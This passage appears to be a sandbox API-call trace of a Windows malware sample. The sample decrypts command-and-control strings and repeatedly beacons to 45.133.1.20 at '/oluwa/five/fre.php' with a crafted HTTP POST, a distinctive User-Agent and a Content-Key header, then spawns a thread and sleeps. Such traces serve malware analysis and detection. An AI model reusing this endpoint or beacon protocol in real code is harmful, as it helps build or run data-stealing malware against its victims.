returned="/oluwa/five/fre.php" [0290.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.716] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0290.716] GetProcessHeap () returned 0x6a0000 [0290.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0290.717] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0290.717] GetProcessHeap () returned 0x6a0000 [0290.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0290.717] socket (af=2, type=1, protocol=6) returned 0xacc [0290.717] connect (s=0xacc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0290.798] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0290.798] GetProcessHeap () returned 0x6a0000 [0290.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0290.798] GetProcessHeap () returned 0x6a0000 [0290.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0290.800] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.802] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0290.802] GetProcessHeap () returned 0x6a0000 [0290.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d80b0 [0290.802] GetProcessHeap () returned 0x6a0000 [0290.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.802] GetProcessHeap () returned 0x6a0000 [0290.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0290.802] GetProcessHeap () returned 0x6a0000 [0290.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0290.803] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0290.804] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0290.804] GetProcessHeap () returned 0x6a0000 [0290.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0290.804] GetProcessHeap () returned 0x6a0000 [0290.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0290.805] send (s=0xacc, buf=0x6bd460*, len=242, flags=0) returned 242 [0290.805] send (s=0xacc, buf=0x6bb998*, len=159, flags=0) returned 159 [0290.805] GetProcessHeap () returned 0x6a0000 [0290.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0290.805] recv (in: s=0xacc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0290.881] GetProcessHeap () returned 0x6a0000 [0290.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0290.882] GetProcessHeap () returned 0x6a0000 [0290.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0290.882] GetProcessHeap () returned 0x6a0000 [0290.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d80b0 | out: hHeap=0x6a0000) returned 1 [0290.883] GetProcessHeap () returned 0x6a0000 [0290.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0290.883] closesocket (s=0xacc) returned 0 [0290.884] GetProcessHeap () returned 0x6a0000 [0290.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0290.885] GetProcessHeap () returned 0x6a0000 [0290.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.885] GetProcessHeap () returned 0x6a0000 [0290.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0290.885] GetProcessHeap () returned 0x6a0000 [0290.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0290.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8c4) returned 0xacc [0290.889] Sleep (dwMilliseconds=0xea60) [0290.891] GetProcessHeap () returned 0x6a0000 [0290.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0290.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.892] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0290.916] GetProcessHeap () returned 0x6a0000 [0290.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.917] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.918] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.923] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.923] GetProcessHeap () returned 0x6a0000 [0290.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.925] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0290.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.933] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.935] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0290.935] GetProcessHeap () returned 0x6a0000 [0290.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.936] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.937] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.939] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.941] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.941] GetProcessHeap () returned 0x6a0000 [0290.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0290.941] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0290.941] GetProcessHeap () returned 0x6a0000 [0290.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0290.945] GetProcessHeap () returned 0x6a0000 [0290.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0290.945] GetProcessHeap () returned 0x6a0000 [0290.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0290.946] GetProcessHeap () returned 0x6a0000 [0290.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0290.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.957] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0290.968] GetProcessHeap () returned 0x6a0000 [0290.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0290.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.970] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0290.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.971] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.973] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.973] GetProcessHeap () returned 0x6a0000 [0290.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0290.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.977] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0290.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.978] CryptDestroyKey (hKey=0x6ad020) returned 1 [0290.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0290.980] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0290.980] GetProcessHeap () returned 0x6a0000 [0290.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0290.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.981] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0290.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.983] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0290.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.984] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0290.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.985] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0290.985] GetProcessHeap () returned 0x6a0000 [0290.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0290.988] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0290.988] GetProcessHeap () returned 0x6a0000 [0290.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0290.988] socket (af=2, type=1, protocol=6) returned 0xad0 [0290.988] connect (s=0xad0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0291.011] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0291.011] GetProcessHeap () returned 0x6a0000 [0291.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0291.012] GetProcessHeap () returned 0x6a0000 [0291.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0291.012] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.013] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.013] GetProcessHeap () returned 0x6a0000 [0291.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d8530 [0291.013] GetProcessHeap () returned 0x6a0000 [0291.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.014] GetProcessHeap () returned 0x6a0000 [0291.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0291.014] GetProcessHeap () returned 0x6a0000 [0291.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0291.015] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.015] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.015] GetProcessHeap () returned 0x6a0000 [0291.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0291.015] GetProcessHeap () returned 0x6a0000 [0291.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.016] send (s=0xad0, buf=0x6bd460*, len=242, flags=0) returned 242 [0291.017] send (s=0xad0, buf=0x6bb998*, len=159, flags=0) returned 159 [0291.017] GetProcessHeap () returned 0x6a0000 [0291.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0291.017] recv (in: s=0xad0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0291.098] GetProcessHeap () returned 0x6a0000 [0291.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0291.099] GetProcessHeap () returned 0x6a0000 [0291.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0291.100] GetProcessHeap () returned 0x6a0000 [0291.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8530 | out: hHeap=0x6a0000) returned 1 [0291.101] GetProcessHeap () returned 0x6a0000 [0291.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0291.103] closesocket (s=0xad0) returned 0 [0291.103] GetProcessHeap () returned 0x6a0000 [0291.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0291.103] GetProcessHeap () returned 0x6a0000 [0291.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.104] GetProcessHeap () returned 0x6a0000 [0291.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0291.105] GetProcessHeap () returned 0x6a0000 [0291.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0291.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfbc) returned 0xad0 [0291.107] Sleep (dwMilliseconds=0xea60) [0291.110] GetProcessHeap () returned 0x6a0000 [0291.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0291.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.113] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0291.131] GetProcessHeap () returned 0x6a0000 [0291.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0291.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.133] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0291.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.134] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.135] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.136] GetProcessHeap () returned 0x6a0000 [0291.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0291.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.153] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0291.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.155] CryptDestroyKey (hKey=0x6ad020) returned 1 [0291.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.156] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0291.160] GetProcessHeap () returned 0x6a0000 [0291.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.162] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.167] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.167] GetProcessHeap () returned 0x6a0000 [0291.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0291.167] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0291.171] GetProcessHeap () returned 0x6a0000 [0291.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0291.172] GetProcessHeap () returned 0x6a0000 [0291.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.173] GetProcessHeap () returned 0x6a0000 [0291.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0291.173] GetProcessHeap () returned 0x6a0000 [0291.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0291.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.174] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0291.191] GetProcessHeap () returned 0x6a0000 [0291.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0291.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.192] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0291.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.193] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.194] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.194] GetProcessHeap () returned 0x6a0000 [0291.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0291.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.196] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0291.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.197] CryptDestroyKey (hKey=0x6ad020) returned 1 [0291.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.198] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0291.198] GetProcessHeap () returned 0x6a0000 [0291.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.199] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0291.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.200] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0291.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.201] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0291.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.205] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0291.205] GetProcessHeap () returned 0x6a0000 [0291.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0291.205] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0291.205] GetProcessHeap () returned 0x6a0000 [0291.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 